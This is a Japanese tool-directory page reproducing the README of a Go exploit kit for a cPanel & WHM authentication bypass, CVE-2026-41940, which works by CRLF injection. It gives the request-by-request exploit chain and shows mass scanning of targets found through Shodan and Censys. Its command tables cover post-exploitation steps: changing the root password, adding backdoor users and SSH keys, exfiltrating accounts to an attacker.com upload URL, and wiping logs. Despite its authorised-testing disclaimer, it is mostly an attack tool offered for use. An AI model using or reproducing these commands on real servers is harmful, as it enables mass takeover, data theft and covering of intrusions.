Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-41940-Exploit-PoC — CVE-2026-41940のエクスプロイトPoC。cPanel & WHMにおけるCRLFインジェクションを介した認証バイパスです。マススキャン、ポストエクスプロイテーション操作、および認可されたテスト用の対話型シェルを含みます。 | Kitploit
ツール/GitHubGitHub/ishanoshada/cve-2026-41940-exploit-poc
認証と認可脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ポストエクスプロイトペネトレーションテストレッドチーミングペイロード開発

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
ishanoshada/cve-2026-41940-exploit-poc

CVE-2026-41940-Exploit-PoC

CVE-2026-41940のエクスプロイトPoC。cPanel & WHMにおけるCRLFインジェクションを介した認証バイパスです。マススキャン、ポストエクスプロイテーション操作、および認可されたテスト用の対話型シェルを含みます。

リポジトリを見るウェブサイト
213ヶ月前未レビュー

CVE-2026-41940 エクスプロイト PoC – cPanel & WHM 認証バイパス

CVE-2026-41940 CVSS Go Version License

作成者: Ishan Oshada | GitHub

⚠️ 認可されたセキュリティテスト専用です。無断使用は違法です。

1


📋 目次

  • 脆弱性の概要
  • エクスプロイトチェーン
  • 機能
  • インストール
  • クイックスタート
  • 使用例
  • エクスプロイト後のアクション
  • 対話型シェルコマンド
  • urls.txt による一括スキャン
  • 出力例
  • オプションリファレンス
  • 影響を受けるバージョン
  • 全プラットフォーム向けビルド
  • FAQとトラブルシューティング
  • 免責事項
  • 作成者

2

脆弱性の概要

CVE-2026-41940 は、cPanel & WHM(バージョン < 11.110.0.97、11.118.0.63、11.126.0.54、11.132.0.29、11.134.0.20、11.136.0.5)における CRLFインジェクション の脆弱性です。

saveSession() 関数は、filter_sessiondata() を適用した後にセッションデータを書き込みますが、フィルタの適用が遅すぎます。Authorization: Basic ヘッダー内に CRLF(\r\n)文字を注入することで、攻撃者はディスク上のセッションファイルを任意のキーと値のペア(例:hasroot=1、tfa_verified=1、user=root)で汚染できます。

汚染されたセッションが後で読み込まれると、cPanel/WHM はパスワードなしで完全なルートアクセスを許可します。

CVSS スコア: 10.0(CRITICAL)

  • 攻撃ベクトル: ネットワーク
  • 攻撃の複雑さ: 低
  • 必要な権限: なし
  • ユーザー操作: なし
  • 機密性: 高
  • 完全性: 高
  • 可用性: 高

エクスプロイトチェーン(4段階)


機能

  • ✅ 単一および一括スキャン(ファイル入力、標準入力パイプ)
  • ✅ スレッドスキャン(100以上のスレッドまで並行性を制御)
  • ✅ 詳細モード(--verbose)– 完全なHTTPリクエスト/レスポンスを表示
  • ✅ JSON出力(脆弱なターゲットが見つかったときに自動保存)
  • ✅ 10のエクスプロイト後アクション(下記の表を参照)
  • ✅ クロスプラットフォーム(Windows、Linux、macOS)
  • ✅ 外部依存関係なし(Go標準ライブラリのみ)
  • ✅ カラフルなターミナル出力と明確なボックス化された結果
  • ✅ セッション永続化 – キープアライブメカニズム
  • ✅ コマンド履歴付きの対話型WHMシェル

インストール

前提条件

  • Go 1.20 以上(ダウンロード)

リポジトリのクローン

root@kitploit:~
git clone https://github.com/ishanoshada/CVE-2026-41940-Exploit-PoC.git
cd CVE-2026-41940-Exploit-PoC

実行可能ファイルのビルド

Windows

root@kitploit:~
go build -o cpanel_sniper.exe main.go

Linux / macOS

root@kitploit:~
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper

直接実行(ビルド不要)

root@kitploit:~
go run main.go -u https://target.com:2087

ビルド済みバイナリ(最速の方法)

ソースからビルドする代わりに、リポジトリから最新の安定版実行ファイルを直接ダウンロードできます。これらは更新のたびに自動生成されます:

注記: Linux または macOS を使用する場合は、ダウンロード後に実行権限を付与することを忘れないでください:


クイックスタート

root@kitploit:~
# 基本スキャン
go run main.go -u https://target.com:2087

# すべてのcPanelアカウントを一覧表示
go run main.go -u https://target.com:2087 -action list

# 対話型WHMシェル
go run main.go -u https://target.com:2087 -action shell

# urls.txt による一括スキャン
go run main.go -l urls.txt -t 20 -o results.json

使用例(表)


エクスプロイト後のアクション


対話型シェルコマンド

シェル内(-action shell)に入ったら、以下のコマンドを使用します:


urls.txt による一括スキャン

リポジトリには、一括スキャン用の1000のサンプルターゲットを含む urls.txt が含まれています。

urls.txt の形式

root@kitploit:~
https://192.168.1.1:2087
https://192.168.1.2:2087
https://example1.com:2087
https://example2.com:2087
...

一括スキャンコマンド

root@kitploit:~
# 基本の一括スキャン(10スレッド)
go run main.go -l urls.txt

# 高速一括スキャン(50スレッド、結果を保存)
go run main.go -l urls.txt -t 50 -o results.json

# エクスプロイト後アクション付き一括スキャン
go run main.go -l urls.txt -t 20 -action list -o hacked_servers.json

# 詳細出力付き一括スキャン
go run main.go -l urls.txt -t 10 --verbose

# タイムアウト延長付き一括スキャン(低速ネットワーク用)
go run main.go -l urls.txt -t 30 -timeout 30

urls.txt を自分で生成

root@kitploit:~
# IPレンジを生成(Linux/macOS)
for i in {1..254}; do echo "https://192.168.1.$i:2087"; done > urls.txt

# IPレンジを生成(Windows PowerShell)
1..254 | ForEach-Object { "https://192.168.1.$($_):2087" } > urls.txt

# Shodan から
shodan search --fields ip_str,port 'title:"WHM Login"' | awk '{print "https://"$1":"$2}' > urls.txt

# Censys から
censys search 'services.port=2087' | awk '{print "https://"$1":2087"}' > urls.txt

出力例

脆弱なターゲットが検出された場合

root@kitploit:~
╔════════════════════════════════════════════════════════════════╗
║                    VULNERABLE TARGET DETECTED                  ║
╠════════════════════════════════════════════════════════════════╣
║ Target: https://target.example.com:2087                        ║
║ Token: /cpsess1234567890                                       ║
║ Version: 11.76.0.22                                            ║
║ Session: :od2aMhg5zJeQunUy...                                  ║
║ API URL: https://target.example.com:2087/cpsess1234567890/json-api/version ║
╚════════════════════════════════════════════════════════════════╝

[+] Action: LIST
    • User: admin | Domain: example.com
    • User: backup | Domain: backup.example.com
    • User: client1 | Domain: client1.com

サマリー出力

root@kitploit:~
════════════════════════════════════════════════════════════════════
                    SCAN COMPLETE SUMMARY
════════════════════════════════════════════════════════════════════
  Total Targets Scanned: 1000
  Vulnerable Targets: 47
  Time Elapsed: 125.34 seconds

VULNERABLE TARGETS:
────────────────────────────────────────────────────────────────
  1. https://192.168.1.15:2087
      Token: /cpsess1111111111
      Version: 11.76.0.22
      Session: :od2aMhg5zJeQunUy...
  2. https://192.168.1.42:2087
      Token: /cpsess2222222222
      Version: 11.86.0.15
      Session: Km2psnYR9w3rRkLU...
  3. https://example.com:2087
      Token: /cpsess3333333333
      Version: 11.118.0.42
      Session: Xk9mQrNtPw3sVbLm...

════════════════════════════════════════════════════════════════════

[✓] Results saved to: results.json

オプションリファレンス


影響を受けるバージョン


全プラットフォーム向けビルド

Windows

root@kitploit:~
go build -o cpanel_sniper.exe main.go
cpanel_sniper.exe -u https://target.com:2087

Linux

root@kitploit:~
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper
./cpanel_sniper -u https://target.com:2087

macOS (Intel)

root@kitploit:~
GOOS=darwin GOARCH=amd64 go build -o cpanel_sniper_mac_intel main.go

macOS (Apple Silicon M1/M2/M3)

root@kitploit:~
GOOS=darwin GOARCH=arm64 go build -o cpanel_sniper_mac_m1 main.go

全プラットフォームのクロスコンパイル

root@kitploit:~
# Windows
GOOS=windows GOARCH=amd64 go build -o cpanel_sniper_windows.exe main.go

# Linux
GOOS=linux GOARCH=amd64 go build -o cpanel_sniper_linux main.go

# macOS Intel
GOOS=darwin GOARCH=amd64 go build -o cpanel_sniper_mac_intel main.go

# macOS M1/M2
GOOS=darwin GOARCH=arm64 go build -o cpanel_sniper_mac_m1 main.go

# Linux ARM (Raspberry Pi)
GOOS=linux GOARCH=arm64 go build -o cpanel_sniper_linux_arm64 main.go

ディレクトリ構造

root@kitploit:~
CVE-2026-41940-Exploit-PoC/
├── README.md           # ドキュメント
├── bin/                # ビルド済みマルチプラットフォーム実行ファイル
│   ├── windows_x64/
│   ├── linux_x64/
│   └── ...
├── main.go             # メインソースコード
├── urls.txt            # 1000のサンプルターゲット
├── go.mod              # Goモジュールファイル
├── .gitignore          # Git無視ファイル
└── results.json        # 出力ファイル(生成)

免責事項

このツールは教育目的および認可されたペネトレーションテスト専用です。

コンピュータシステムへの無断アクセスは、以下の法律で違法とされています:

  • コンピュータ詐欺及び悪用取締法(CFAA)- 米国
  • コンピュータ不正使用法 - 英国
  • 情報技術法 - インド
  • 世界中の同様の法律

作成者は誤用に対する責任を負いません。自己責任で使用してください。

このツールを使用することで、ターゲットシステムをテストする適切な認可を持っていることに同意したものとみなされます。


作成者

Ishan Oshada

  • 🔗 ウェブサイト: ishanoshada.com
  • 🐙 GitHub: github.com/ishanoshada
  • 📧 メール: [email protected]

Views

サポート

このツールが役立つと思われた場合:

  • ⭐ GitHub でリポジトリにスターを付ける
  • 🔄 セキュリティコミュニティと共有する
  • 📝 GitHub Issues で問題を報告する

ハッピーハッキング! 🚀

覚えておいてください:大きな力には大きな責任が伴います。倫理的に使用してください。

ツールをダウンロード
段階アクション説明
1POST /login/?login_only=1誤った認証情報で事前認証セッションクッキーを要求
2GET / + CRLF Authorization ヘッダーhasroot=1、user=root などでセッションファイルを汚染
3GET /scripts2/listacctsセッションキャッシュに汚染されたファイルの再読み込みを強制(伝播)
4GET /cpsess<TOKEN>/json-api/versionルートアクセスを検証 – 成功 = 200 + バージョンデータ
プラットフォーム場所
Windows (x64)/bin/windows_x64/cpanel_sniper.exe
Linux (x64)/bin/linux_x64/cpanel_sniper
Linux (ARM64)/bin/linux_arm64/cpanel_sniper
macOS (Intel)/bin/mac_intel/cpanel_sniper
macOS (M1/M2/M3)/bin/mac_m1_m2/cpanel_sniper
#目的コマンド
1単一ターゲットの基本スキャンgo run main.go -u https://target.com:2087
2すべてのcPanelアカウントを一覧表示go run main.go -u https://target.com:2087 -action list
3ルートパスワードを変更go run main.go -u https://target.com:2087 -action passwd -passwd "NewP@ssw0rd!2006"
4システムコマンドを実行go run main.go -u https://target.com:2087 -action cmd -cmd "id && whoami"
5サーバー情報を取得go run main.go -u https://target.com:2087 -action info
6バックドアユーザーを作成go run main.go -u https://target.com:2087 -action adduser -new-user backdoor -new-domain backdoor.com -passwd "Pass123!2006"
7APIトークンを作成(ステルス)go run main.go -u https://target.com:2087 -action apitoken -tokenname mytoken
8SSHキーを注入go run main.go -u https://target.com:2087 -action sshkey -sshkey "ssh-rsa AAAAB3NzaC1yc2E..."
9アカウントをダンプ&外部送信go run main.go -u https://target.com:2087 -action dumpacct -dumpuser victim -exfil https://attacker.com/upload
10ログを消去&痕跡を隠蔽go run main.go -u https://target.com:2087 -action wipe
11対話型WHMシェルgo run main.go -u https://target.com:2087 -action shell
12ファイルから一括スキャンgo run main.go -l urls.txt -t 20 -o results.json
13結果をJSONに保存go run main.go -u https://target.com:2087 -o scan_results.json
14詳細デバッグを有効化go run main.go -u https://target.com:2087 --verbose
15他のツールからパイプcat urls.txt | go run main.go -t 20
16タイムアウトを延長go run main.go -u https://target.com:2087 -timeout 30
アクションフラグ説明ステルスレベル
list-action listすべてのcPanelアカウントを一覧表示低
passwd-action passwd -passwd NEWPASSルートパスワードを変更(ノイジー)高(検出可能)
cmd-action cmd -cmd "id"OSコマンドを実行中
info-action infoホスト名、負荷、バージョンを表示低
adduser-action adduser -new-user U -new-domain DバックドアcPanelユーザーを作成中
apitoken-action apitoken [-tokenname NAME]永続的なAPIトークンを生成非常に低
sshkey-action sshkey -sshkey "ssh-rsa..."SSH公開鍵をルートに注入非常に低
dumpacct-action dumpacct -dumpuser USER -exfil URLアカウントをバックアップ&外部送信中
wipe-action wipeWAFを無効化、ログを消去、履歴を消去痕跡を隠蔽
shell-action shell対話型WHMシェル低
コマンド説明例
accountsすべてのcPanelアカウントを一覧表示accounts
passwd <pass>ルートパスワードを変更passwd MyNewPass123!2006
exec <command>システムコマンドを実行exec "cat /etc/passwd"
infoサーバー情報を表示info
versioncPanelバージョンを表示version
help利用可能なコマンドを表示help
exitシェルを終了exit
オプション型デフォルト説明
-ustring-ターゲットURL(例:https://example.com:2087)
-lstring-ターゲットを含むファイル(1行に1つ)
-tint10同時スレッド数
-actionstring-エクスプロイト後アクション
-passwdstring-新しいパスワード(passwd/adduser 用)
-cmdstring-実行するコマンド(cmd アクション用)
-new-userstring-adduser アクション用のユーザー名
-new-domainstring-adduser アクション用のドメイン
-tokennamestring-APIトークンの名前(apitoken アクション用)
-sshkeystring-注入する公開SSHキー(sshkey アクション用)
-dumpuserstring-バックアップするユーザー名(dumpacct アクション用)
-exfilstring-外部送信用のリモートURL(dumpacct アクション用)
-ostring-出力JSONファイル(検出時に自動保存)
--verboseboolfalseHTTPリクエスト/レスポンスを表示
-hboolfalseヘルプメニューを表示
ブランチパッチ適用済みバージョン脆弱な <
11.11011.110.0.9711.110.0.96
11.11811.118.0.6311.118.0.62
11.12611.126.0.5411.126.0.53
11.13211.132.0.2911.132.0.28
11.13411.134.0.2011.134.0.19
11.13611.136.0.511.136.0.4